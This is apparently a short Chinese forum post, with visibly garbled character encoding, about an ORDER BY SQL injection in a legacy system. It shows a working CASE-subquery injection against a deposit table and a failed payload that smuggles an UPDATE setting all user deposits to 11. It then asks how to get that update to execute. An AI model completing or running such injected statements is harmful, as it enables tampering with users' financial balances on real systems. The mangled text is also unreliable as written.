發(fā)現(xiàn)一個(gè)正在維護(hù)的老系統(tǒng)的基于orderBy的sql注入漏洞����,準(zhǔn)備驗(yàn)證一下��,
我先執(zhí)行這個(gè)sql注入�����,是可以的
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0
但是當(dāng)我執(zhí)行這個(gè)帶update語(yǔ)句的sql時(shí)報(bào)錯(cuò)了:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0
報(bào)錯(cuò)
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update<br>
sysuser_user_deposit<br>
set<br>
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>
我應(yīng)該如何讓他執(zhí)行update?
